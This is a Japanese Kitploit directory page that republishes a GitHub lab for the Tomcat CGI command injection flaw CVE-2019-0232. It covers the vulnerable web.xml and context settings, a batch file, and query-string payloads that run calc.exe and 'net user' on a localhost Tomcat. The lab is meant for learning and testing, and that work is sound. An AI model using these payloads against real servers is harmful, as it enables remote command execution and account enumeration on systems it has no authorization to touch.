Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-0232 — CVE-2019-0232(Tomcat CGIコマンドインジェクションの脆弱性)を悪用するためのステップバイステップのラボ環境。セットアップ手順とペイロード例を収録。 | Kitploit
ツール/GitHubGitHub/xsxtw/cve-2019-0232
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubxsxtw/cve-2019-0232

CVE-2019-0232

CVE-2019-0232(Tomcat CGIコマンドインジェクションの脆弱性)を悪用するためのステップバイステップのラボ環境。セットアップ手順とペイロード例を収録。

リポジトリを見る
2年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

脆弱性環境

root@kitploit:~
Tomcat 8.5.39

Jdk 8u121

web.xml ファイルの編集

root@kitploit:~
<servlet>
        <servlet-name>cgi</servlet-name>
        <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
        <init-param>
          <param-name>debug</param-name>
          <param-value>0</param-value>
        </init-param>
        <init-param>
          <param-name>cgiPathPrefix</param-name>
          <param-value>WEB-INF/cgi-bin</param-value>
        </init-param>
        <init-param>
          <param-name>executable</param-name>
          <param-value></param-value>
        </init-param>
         <load-on-startup>5</load-on-startup>
</servlet> 

<!-- The mapping for the CGI Gateway servlet -->

    <servlet-mapping>
        <servlet-name>cgi</servlet-name>
        <url-pattern>/cgi-bin/*</url-pattern>
    </servlet-mapping>

content.xml ファイルの編集

root@kitploit:~
<Context privileged="true">

    <!-- Default set of monitored resources. If one of these changes, the    -->
    <!-- web application will be reloaded.                                   -->
    <WatchedResource>WEB-INF/web.xml</WatchedResource>
    <WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>

    <!-- Uncomment this to disable session persistence across Tomcat restarts -->
    <!--
    <Manager pathname="" />
    -->
</Context>

hello.bat ファイルの作成

root@kitploit:~
echo Content-type: text/html     //whatever the content in batch file

WEB-INF ディレクトリを $CATALINA_HOME/webapps/ROOT に移動し、Tomcat サーバーを再起動する

Windows OS コマンドインジェクションを使用してターゲット Tomcat サーバーにリクエストを送信する

root@kitploit:~
http://localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Ccalc.exe

http://localhost:8080/cgi-bin/hello.bat?&net+user
ツールをダウンロード